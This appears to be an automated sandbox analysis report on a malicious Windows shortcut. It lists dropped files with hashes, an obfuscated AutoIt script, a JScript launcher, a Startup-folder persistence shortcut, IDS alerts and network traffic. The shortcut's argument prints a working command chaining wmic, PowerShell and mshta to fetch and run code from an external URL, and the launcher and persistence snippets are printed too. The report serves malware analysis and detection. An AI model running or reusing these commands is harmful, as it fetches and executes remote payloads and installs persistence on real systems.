                                                                        Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]

                                                                        C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js

                                                                        Download File
                                                                        Process:C:\Users\Public\Guard.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):186
                                                                        Entropy (8bit):4.761058342183721
                                                                        Encrypted:false
                                                                        SSDEEP:3:RiMIpGXfeNH5E5wWAX+TSyCVVh4EkD5yKXW/Zi+0/RaMl85uWAX+TSyCVVh4EkDO:RiJbNHCwWDmLJkDrXW/Zz0tl8wWDmLJX
                                                                        MD5:6B09F9AC501B58CCD5BC08B41FF85624
                                                                        SHA1:95272508F2347856331B1017A86F63B5F87FCD68
                                                                        SHA-256:D5F306EB2125F34C25704C8B9611AA1367A772EF02D7BAA1789D8C7026D17BE6
                                                                        SHA-512:721BD6DA01A3DC639958E2D801C1A10B7E0B9D4363B4182219BD6261737D67B172236DC2C651DC753DC91DE6CEB94B74977E8EF1578A262EF5D27A6DC2F428D2
                                                                        Malicious:true
                                                                        Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")

                                                                        C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif

                                                                        Download File
                                                                        Process:C:\Users\Public\Guard.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):893608
                                                                        Entropy (8bit):6.62028134425878
                                                                        Encrypted:false
                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):99
                                                                        Entropy (8bit):4.943821049972357
                                                                        Encrypted:false
                                                                        SSDEEP:3:HRAbABGQaFyw3pYoCHyg4E2J5yKXW/Zi+URAAy:HRYF5yjoCHhJ23yKXW/Zzyy
                                                                        MD5:837A8AFA0534369AF64741AFD86F5093
                                                                        SHA1:7569D32D0ADD2EEE25705C4BC101B7898D357370
                                                                        SHA-256:C13B04EFBFBFB63EE7B34BB6DD95A7C433C3A81BB08BCB3DE97334D2146EFB81
                                                                        SHA-512:5A34E5614CD2E6E034FD4F3E5065E4F22E7B5BA7B3EED6A5E693C3291ED6C4717DCCEE898BB98547BE6F09277D1CAD8DDA4C104E318E4D5971D67B63405D9910
                                                                        Malicious:true
                                                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..

                                                                        C:\Users\user\AppData\Roaming\Project_Information.pdf

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PDF document, version 1.5, 7 pages (zip deflate encoded)
                                                                        Category:dropped
                                                                        Size (bytes):382562
                                                                        Entropy (8bit):7.568010490995865
                                                                        Encrypted:false
                                                                        SSDEEP:6144:dozIzH/hHHXwI45QTULrCe49nPbJ3V2T8JW:do6/ZAI45QALrCeObJgTF
                                                                        MD5:0863C46694D51D3248DE554D6ECD9442
                                                                        SHA1:AF2E1D8FF367051202D9921726AC303A4D451E07
                                                                        SHA-256:D88D5D6411B8ADAE9A6688B64DE843BD6EAB303724181256EE5FB2F8440D4F3A
                                                                        SHA-512:63FEC7F0FD266903FE43EC5F207A874B78D4427B34911D99C29C5E2CA4CF00DFE3D0D4CCD67B2A9413A26CDF9D80A8C77BCF68E10A7B150F91BC0FF31E8F0859
                                                                        Malicious:false
                                                                        Preview:%PDF-1.5..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 31 0 R/MarkInfo<</Marked true>>>>..endobj..2 0 obj..<</Type/Pages/Count 7/Kids[ 3 0 R 6 0 R 18 0 R 20 0 R 24 0 R 26 0 R 28 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</XObject<</Image5 5 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 540 720] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 126>>..stream..x.m.1..P...................M...dQ..(."....n@.>v.l[.R.].`N.6..BI.x.*..W...5de,...T..#.3.....W.....^....<..n>Mc@...y..i'...endstream..endobj..5 0 obj..<</Type/XObject/Subtype/Image/Width 1554/Height 2199/ColorSpace/DeviceRGB/BitsPerComponent 8/Filter/DCTDecode/Interpolate true/Length 172175>>..stream........JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."..........

                                                                        C:\Users\user\AppData\Roaming\XKIZdXAs.exe

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1083904
                                                                        Entropy (8bit):6.30643452024023
                                                                        Encrypted:false
                                                                        SSDEEP:24576:xrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaI1M:x2EYTb8atv1orq+pEiSDTj1VyvBa6
                                                                        MD5:2A89603D2620B2A62113513709E38E95
                                                                        SHA1:E82753848FBD2E4C993661A80AD11CCA2FA73B77
                                                                        SHA-256:B52B0E15BCDC6B45A70FBF908381B1385B1A84BF6EB2BCFC35CB684B774021F7
                                                                        SHA-512:2AD57BCDE8D647CF8C7DA2FE563ED07F9F51E4D4A61397C459705C95D14AC0F48E95AE49126947BD4A7A8B7FC360A3A336A9BBA41111CEDDA422FAF508773E98
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 35%
                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d.....jg.........."......4...R.......T.........@....................................p.....`...@...............@..............................\..|........A...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....A.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................

                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                        \Device\ConDrv

                                                                        Download File
                                                                        Process:C:\Windows\System32\wbem\WMIC.exe
                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                        Category:dropped
                                                                        Size (bytes):160
                                                                        Entropy (8bit):5.083203110114614
                                                                        Encrypted:false
                                                                        SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgldL/AFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egryeAin
                                                                        MD5:31F81501D06BB9AA0197B769156B9AF4
                                                                        SHA1:7A1358F0D604E53006B61FDAB148C0B94916AF63
                                                                        SHA-256:7F841B32E141480CDD9C57ADD534EE6D7F2754E50DE5A9A2BE027E0B81D5C95F
                                                                        SHA-512:E01B05AB4CB20C58019DD1415CB8A4DBB39C0EC57AC8B833F710A84B2BA543E1E96368519B430392E134C570376CD1A229686F92488FDB50F50668335B4BFB67
                                                                        Malicious:false
                                                                        Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7832;...ReturnValue = 0;..};....

                                                                        Static File Info

                                                                        General

                                                                        File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                        Entropy (8bit):2.6406088765710773
                                                                        TrID:
                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                        File name:n5Szx8qsFB.lnk
                                                                        File size:1'920 bytes
                                                                        MD5:a1cfce4d0ce44d183b7c9c5bbce9d8f5
                                                                        SHA1:f5f7d71c40e07bb97f55754f920879f05747754e
                                                                        SHA256:be673f7be053fa7deb72a5e592c48c2acfc2f6f31c5c5aeaaf03602419aa00e9
                                                                        SHA512:fb7e71b6ae59143a72128700b577353ebf6fd627f7f02495975bc072b900b4c6c7770755150509d4ec8929d10b16371dcfe74e81a406aef4ad3cb2c099b1a3ff
                                                                        SSDEEP:24:8AyH/BUlgKN4e9+/38kWNdk6Zoc6w8qdd79dsrabqyI+pu:89uGeK8ldkU6UdJ9Aaey3w
                                                                        TLSH:4C415E082AE90B20F3B7DE72587AB321997F7C49DD728F1C018186892536620F475F6B
                                                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                        File Icon

                                                                        Icon Hash:72d282828e8d8dd5

                                                                        Static Windows Shortcut Info

                                                                        General

                                                                        Relative Path:..\..\..\..\..\Windows\System32\Wbem\wmic.exe
                                                                        Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"
                                                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-27T09:05:26.683305+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849711147.45.49.155443TCP
                                                                        2024-12-27T09:05:34.077266+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.849722147.45.49.155443TCP
                                                                        2024-12-27T09:05:34.331279+01001810003Joe Security ANOMALY Windows PowerShell HTTP PE File Download2147.45.49.155443192.168.2.849722TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 27, 2024 09:05:15.519646883 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:15.519682884 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:15.519917965 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:15.590751886 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:15.590775013 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.151045084 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.151119947 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:17.220261097 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:17.220292091 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.220650911 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.220700979 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:17.223469019 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:17.271327019 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.770606995 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.770658970 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:17.971697092 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.971712112 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.971780062 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.971795082 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:17.971823931 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:17.971837997 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:17.971874952 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.024584055 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.024605989 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.024657011 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.024672985 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.024749994 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.024749994 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.173094988 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.173120975 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.173171997 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.173202038 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.173223019 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.173283100 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.203048944 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.203068972 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.203140974 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.203171015 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.203270912 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.233737946 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.233764887 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.233835936 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.233864069 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.233908892 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.272030115 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.272053003 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.272104979 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.272136927 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.272150993 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.272186041 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.377669096 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.377691984 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.377762079 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.377772093 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.377824068 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.398593903 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.398612022 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.398668051 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.398678064 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.398701906 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.398725033 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.414202929 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.414223909 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.414273977 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.414278984 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.414335012 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.425884962 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.425904036 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.425966024 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.425976992 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.426012039 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.474349976 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.474379063 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.474428892 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.474436045 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.474469900 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.474490881 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.574937105 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.574966908 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.575037003 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.575046062 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.575081110 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.584474087 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.584508896 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.584542036 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.584547997 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.584604979 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.596694946 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.596719027 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.596767902 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.596775055 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.596791983 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.596816063 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.608175993 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.608194113 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.608272076 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.608279943 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.608323097 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.617101908 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.617117882 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.617163897 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.617171049 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.617202044 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.617223024 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.625484943 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.625513077 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.625560045 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.625566006 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.625597000 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.625617027 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.633224964 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.633253098 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.633296967 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.633302927 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.633352041 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.633374929 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.676337957 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.676369905 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.676418066 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.676436901 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.676461935 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.676476955 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.777838945 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.777868986 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.777944088 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.777945042 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.777971983 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.778028011 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.785377979 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.785406113 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.785482883 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.785502911 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.785525084 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.785732031 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.792036057 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.792061090 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.792125940 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.792143106 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.792156935 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.792181969 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.799619913 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.799649000 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.799699068 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.799710035 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.799741030 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.799758911 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.807167053 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.807182074 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.807250023 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.807264090 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.807301044 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.814364910 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.814373016 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.814426899 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.814441919 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.814455986 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.814503908 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.821981907 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.822014093 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.822053909 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.822061062 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.822091103 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.822112083 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.876987934 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.877083063 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.877085924 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.877154112 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.877370119 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.877383947 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:21.019643068 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:21.019686937 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:21.019782066 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:21.028373957 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:21.028390884 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:22.626708984 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:22.626789093 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:22.628489017 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:22.628496885 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:22.628849030 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:22.635529041 CET49709443192.168.2.8147.45.49.155
